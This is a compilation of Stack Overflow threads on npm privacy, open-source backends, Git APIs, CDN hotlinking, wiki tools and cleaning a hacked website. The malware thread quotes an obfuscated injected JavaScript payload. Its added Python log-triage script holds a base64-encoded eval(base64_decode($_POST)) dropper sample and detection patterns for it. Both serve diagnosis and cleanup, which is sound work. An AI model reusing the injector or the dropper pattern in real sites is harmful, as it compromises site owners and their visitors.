Can hosting a package on Npm cause Data privacy concerns? - npm

We are creating a Web component that will be available via a self-hosted CDN in Europe.
The idea is to make it as easy as possible for developers to integrate the Web component in a Website.
One of those ways is to publish it on npm.
The question now is:
Since the project is subject to very strict data privacy requirements:
Could one make the case that npm is unsafe from the perspective of data privacy?
In other words: does the act of publishing an npm package cause a data privacy issue for the consuming developer or, more specifically, the end user using the Web component in the browser?
Of course, this question excludes issues with the Web Component itself, since they can cause an issue on their own. I am only interested in hosting a package on npm.
Upon some investigation: I am from Germany, and data privacy and data protection seem to translate to the same word (Datenschutz). So in this question both are meant.

I would not use StackOverflow to seek advice on complying with data privacy laws or regulations. I am not a lawyer and I doubt very many people on here are. That said, there are some generalities that can be made that may or may not apply to your specific case. Again, I am not a lawyer, and this is not legal advice.
I'm not sure if you are talking about the public npm registry or a private one.
In terms of data privacy, publishing your code to the public npm registry isn't much different from publishing it to GitHub or to a blog. If the code, examples, documentation, and various configuration files do not contain sensitive data, publishing them to the public npm registry won't create issues. If one or more files that you publish do contain sensitive data, then publishing them to the npm registry will pose similar risks to posting them to GitHub or a blog.
If you are using a private npm registry, things might be a lot more complicated and I would not trust an answer on StackOverflow. Get your data security folks talking to your developers and the people who are doing the registry hosting.


It's a security issue if I post the backend code of my open source project?

Currently I'm creating an open source project and I want people to participate in creating the backend code, a simple API. May sound newbie, but I've been told that I should never make my backend code public, for security reasons. Then how can people collaborate on making the API if they can't make it public? Should they secretly send me the code, or are there no security issues in doing so?
Thank you very much.
No, it is not a security issue in itself. There are lots of good, well-secured open source backends, and libs for writing backends are published in open public repositories.
And the opposite: if you deploy a non-secure backend (i.e. with bugs, old exploited libs, etc.), even the privacy of your source code will not help you. Public source code will make it faster to break into, but it does not make it less secure compared with private code.

Is it possible to remote access and parse git revision history?

I have a use case where I need to be able to inspect Git repositories as part of a web service, and the average repo size will be very large (1GB+) due to being used for video game projects. I need to do simple actions such as listing the revision history, etc.
Right now I'm implementing it via API calls to the remote Git host services (Github, Bitbucket, etc). This works okay, however there are some great Git projects like GitVersion that only work with real Git repos, that use libGit2sharp, and I cannot easily write a work around for.
I feel like this'll be a longshot, but I was wondering if anyone has discussed or begun work upon an implementation of libGit2sharp that works with the major Git hosts via their APIs. Obviously not all actions available in libGit2 will work with an API interface, but at least most read-only actions should.
If this is an entirely new feature request - I'd like to get the opinion of someone with knowledge of the libGit2sharp codebase about how difficult such a feature request would be to implement.
Git only specifies the network protocol for fetching, pushing and creating an archive. Nothing else can be done via the Git protocol (and providers will likely disable the archive so they can leverage their existing caching solutions).
If this is an entirely new feature request - I'd like to get the opinion of someone with knowledge of the libGit2sharp codebase about how difficult such a feature request would be to implement.
This feature would be out of scope and impossible as Git does not provide a way to perform these tasks.
Once you're trying not to do Git, then you're out of the Git world and into each provider's API. Trying to replicate Git operations and git commands on top of each provider's API is a whole project unto itself, and one which is likely to make you hit these providers' API limits, as in-depth analysis of the repositories is not generally why they provide these services.
Not to mention that looking up each necessary object over HTTP would be extremely slow and you'd likely not gain anything over grabbing a Gigabyte or two from the network.
But if all you need is a few questions that can be easily answered from the APIs themselves (say, latest commit and its relationship to different branches), and you do need the logic in GitVersion, then you're probably better off making its history analysis pluggable so you can put in the data from your API lookups.
I'm not familiar with how GitVersion makes its decisions, but if it doesn't just want references and their relationships to each other and the tags, but rather it wants to look at the repositories themselves, and you do need it rather than just replicate some of its logic, I would recommend to download the repositories and perform all the analysis there. It'll be a much more efficient use of time to rent a bit of disk space from some provider than try to fit each individual provider's API into some idealised version of a git command where you then still need to figure out the edge cases of both the command and its API you're using.

Is it a bad idea to call phaser.min.js directly from GitHub?

As a jQuery user, I link the remote library from Google using
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
which is very clever because it's already loaded in the browser cache if the reader visited another site that did the same.
As I discover Phaser, I was hoping to see people on the web doing the same with
<script src="https://raw.githubusercontent.com/photonstorm/phaser/master/build/phaser.min.js"></script>
or any library host, but apparently no one does.
Is there a reason why Phaser users don't do that?
I would strongly advise against linking to the master release as it will absolutely break your games over time. Most of the 2.0.x updates have been non-API changing, but 2.1 and above will be altering some core aspects of Phaser. You should only ever link to specific versions.
For a similar service to the Google hosted APIs (of which they only host very specific libraries that they've selected) we use CDN.js, which offers the same thing. You can find details in the Phaser README or just go to http://cdnjs.com/ and search for Phaser.
There is as such no issue if you link to a specific version. But you don't want the latest build, as this can potentially break your site by making changes.
I don't know Github's policies on referencing their site like this.

Malware on the site as per google but I cannot find it

Yesterday when I came to one of my sites I got a warning from Google that there is malware on my site. I looked at the code and there was indeed some JavaScript that shouldn't be there. I googled it and didn't find anything useful. When I came back to my site, that code was gone, but Google (when accessing the site from the search engine) and Google Chrome still give me a warning that there is malware on my site.
I looked at Webmaster Tools and they have identified a few pages as problematic. One of them is http://www.keramikfliesen.com/schweiz/rimini/. The code that is listed in Webmaster Tools under Malware is:
<script type='text/javascript'>st="no3nen0orno3pno3rxstxpno3
rxnl";Date&&(a=["a#%d]%b#%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~
%8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!:$$^#$|&:&&$?$]^<^]^]
&+&~&^!*&]&*&_!+$_&^&~&~&#&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!#!?
^+^]^!^$+*^&^#!&&<!$$|&^^]&_&*!!$|++&<!+&*^#&^$_!^&*!+*+&:&]
&*$?&^$_&!&*!+*+&:&]&*$?$:$:^#&*&+^]&_&*!!$|++&<!+&*$?&^$_&!
&*!+*+&:&]&*$?$:$#!?^+$:^#&+&~&^!*&]&*&_!+$_&^&~&~&#&:&*^]&!
^<$#$$^]$$$#&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$:
$#$$^#&*!?!|&:!$&*!^^]$$$#&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$#
$$^#!|&<!+&?^]$~$$^#&!^^^]$$&?!+!+!|^#$~$~$$$#!^!+$_!$&*!|&)
&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?$~&_&~^^$~&!
$)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$$:$#$$$~!+
&~!|^$$_&?!+&]&)$$^#!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$$_
!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~
&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_&^!+&:&~&_$?
$:!#!]^#&?$_!|!$&~!+&~!+!:!|&*^]!#&$^#&&!*&_&^!+&:&~&_$?$:!#
!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!#!&&<!$$|&&^]
&+&~
Can you please help me out? How should I fight this?
Thank you all very much for your help in advance!
Remove the malware from your webpages.
Immediately change your passwords.
Also check for any XSS (cross-site scripting) and SQL injection vulnerabilities.
Deactivate plugins that are not highly ranked or from a reputable source.
Use secure protocols. Check out StopBadware.org's Tips for Cleaning and Securing Your Website.
Keep an eye on your log files.
Stay up-to-date with the latest software updates and patches.
Hope it helps!
If the code appears again, then the attacker left some script which, on request, runs the infecting procedure. Usually this script receives an encoded string of the malcode (e.g. in base64), decodes it and executes it via eval(). You should find this file (it is most likely a PHP script) and remove it. To find it, look at the log and search for suspicious requests (e.g. a single POST request transmitting a base64 string is a very suspicious one).
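A worked example of the log triage the answer above describes, added here and not part of the original thread: it parses constructed Apache combined-format access log lines, flags lone Referer-less POSTs from addresses that never fetched a page, PHP executed from directories that should only hold static files, and base64-looking parameters that decode to printable text, and it checks a constructed PHP snippet for the decode-then-eval dropper pattern. The sample log lines, the PHP snippet, the IP addresses and the static-directory list are all assumptions made up for the example; adjust the directory list to the site's real layout.

```python
"""Triage helpers for a site that keeps getting re-infected: scan the access
log for the kind of request the answer describes (a lone POST carrying an
encoded payload, scripts executed from an upload directory) and scan PHP
files for the decode-then-eval pattern. All sample data is constructed."""
import base64
import re
from typing import Dict, List

# Constructed sample lines in Apache "combined" log format; IPs are from
# documentation ranges and the paths are made up for this example.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2012:13:55:36 +0000] "GET /schweiz/rimini/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2012:13:55:37 +0000] "GET /wp-content/themes/main/style.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2012:13:56:01 +0000] "POST /wp-content/uploads/cache.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.8 - - [10/Oct/2012:13:56:02 +0000] "GET /images/load.php?z=ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnYyddKSk7 HTTP/1.1" 200 12 "-" "curl/7.19.7"
203.0.113.9 - - [10/Oct/2012:13:57:10 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://www.example.test/schweiz/rimini/" "Mozilla/5.0"
"""

# Constructed PHP dropper in the shape the answer describes: decode request data, eval it.
SAMPLE_PHP = "<?php\n$x = base64_decode($_POST['c']);\neval($x);\n"

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
B64_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
# Directories that should serve static content only (assumed; adjust to the site's layout).
STATIC_DIRS = ("/wp-content/uploads/", "/uploads/", "/images/")
PHP_PATTERNS = [
    ("eval of decoded payload", re.compile(r"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I)),
    ("decode of request data", re.compile(r"base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I)),
    ("eval of variable", re.compile(r"eval\s*\(\s*\$\w+\s*\)", re.I)),
]


def parse_log(text: str) -> List[Dict[str, str]]:
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["path"], _, e["query"] = e.pop("target").partition("?")
        entries.append(e)
    return entries


def base64_tokens(text: str) -> List[str]:
    """Return base64-looking runs that decode cleanly to mostly printable bytes.
    Random session ids and hashes usually fail the printable test, which keeps noise down."""
    found = []
    for m in B64_RE.finditer(text):
        tok = m.group(0)
        try:
            raw = base64.b64decode(tok + "=" * (-len(tok) % 4), validate=True)
        except ValueError:  # binascii.Error is a subclass of ValueError
            continue
        if raw and sum(32 <= b < 127 for b in raw) / len(raw) > 0.9:
            found.append(tok)
    return found


def flag_suspicious(entries: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Apply the three heuristics and return one finding per suspicious request."""
    ips_with_gets = {e["ip"] for e in entries if e["method"] == "GET"}
    findings = []
    for e in entries:
        reasons = []
        # A browser submitting a form fetched the page first and sends a Referer;
        # a lone Referer-less POST from an address that fetched nothing is a tool.
        if e["method"] == "POST" and e["referer"] in ("", "-") and e["ip"] not in ips_with_gets:
            reasons.append("lone POST without Referer from an IP that fetched no pages")
        if e["path"].endswith(".php") and any(d in e["path"] for d in STATIC_DIRS):
            reasons.append("PHP executed from a directory that should hold static files")
        for tok in base64_tokens(e["query"]):
            decoded = base64.b64decode(tok + "=" * (-len(tok) % 4)).decode("ascii", "replace")
            reasons.append(f"base64 parameter decodes to: {decoded!r}")
        if reasons:
            findings.append({"ip": e["ip"], "path": e["path"], "reasons": reasons})
    return findings


def scan_php_source(src: str) -> List[str]:
    """Return the names of decode/eval patterns present in one PHP file's source."""
    return [name for name, rx in PHP_PATTERNS if rx.search(src)]


if __name__ == "__main__":
    for f in flag_suspicious(parse_log(SAMPLE_LOG)):
        print(f["ip"], f["path"], "->", "; ".join(f["reasons"]))
    print("dropper patterns:", scan_php_source(SAMPLE_PHP))
```

On the constructed sample the comment form POST with a Referer is left alone while the two requests to PHP files under static directories are flagged, one of them with its base64 parameter decoded so the reviewer can see what was sent. Access logs do not record POST bodies, which is why the lone-POST heuristic works on request shape rather than content; the source scan is the second half, run over every .php file on the host to find the dropper itself.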
Most probably your hosting has been compromised (password stolen) by an automated tool.
These tools typically inject some JavaScript inside js files in order to infect the people visiting your pages with malware. You should:
Change your passwords.
Restore the most recent non-compromised backup.

Looking for a wiki-style, standalone, version-control-"safe" documentation package [closed]

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
We don’t allow questions seeking recommendations for books, tools, software libraries, and more. You can edit the question so it can be answered with facts and citations.
Closed 8 years ago.
My team and I have found that documenting our project (a development platform w/ API) with a wiki is both useful to us and useful to the users. Due to some organizational issues, we're forced to do multi-site development without network connectivity. We've switched to a DVCS (Mercurial) and had great success with this. The wiki documentation proves to be a problem as the central site is setup with MediaWiki. The offsite people have no way to access or edit the wiki.
Is there any sort of wiki-style package which doesn't require a server/database and will be usable in a DVCS environment?
Update: Should be open-source and cross-platform
I can recommend TiddlyWiki. It does not need any web servers, only a browser, stores the entire Wiki documentation in a single HTML page. This can easily be shared through Mercurial.
Edit: Check this page, it discusses how to use TiddlyWiki with DVCS. It involves using an extension dubbed SynchroTiddly.
DokuWiki stores all data in plain text files. You could install local web servers for every developer and use your VC system to sync between developers.
ikiwiki: http://ikiwiki.info/ stores the info directly in the VCS (it supports mercurial as backend).
http://zim-wiki.org/
It's a desktop wiki (WYSIWYG editing, though not very sophisticated formatting) which stores everything in plain-text files. That means you can hold the files in version control, and have a friendly editing experience.
It even has built-in Bazaar support. UPDATE: also Git, Mercurial, and Fossil.
[I know, late to the party - writing for benefit of others reading this question...]
Perhaps you should look at auto-generation of documentation from source. This way, the documentation will automatically be version controlled.
A lot of generators support adding additional documentation via plain-text files which can be added to the repository.
Look into Fossil: it is a DVCS that contains a built-in wiki and bug tracking system. This may be just what you're looking for. Read the site; there is a built-in web server. You can use a CGI script to open up the connection to people (the Fossil website is the Fossil DVCS). After using it you may decide to move your code over to it as well. It is open source, and does have cross-platform builds.
Ended up writing my own system using Python, CherryPy, and Mercurial. Perhaps one day it will end up open-source. Thanks for all the suggestions.
http://hatta-wiki.org/ is a wiki running on a Mercurial repository.
It's interesting to note how it handles conflicts: simultaneous edits are silently merged on commit, even if conflicting and committed with the conflict markers! That's OK because:
it's text, not software
you see the result of your edit immediately after committing
it treats conflict markers as valid wiki syntax (resulting in diff -u like highlighting of the conflict)!
This arrangement motivates you to edit again to resolve the conflict immediately - but doesn't force you to.
Github's gollum is open-source, git based, eats many popular syntaxes.
But the most important selling point of course is that it's built into github.
Bitbucket similarly has a mercurial based wiki. Not sure if the code is open source though (i.e. you can edit the text offline, but not sure that you can see it rendered).
MoinMoin supports storing your pages in a Mercurial repository: http://moinmo.in/Storage2009/HelpOnStorageConfiguration#Mercurial_Backend_.28hg.29
This is quite interesting because MoinMoin has been around for a while, is rather well supported, and has a rich set of features (but that's just my opinion; don't take my word for it and see for yourself ;-)).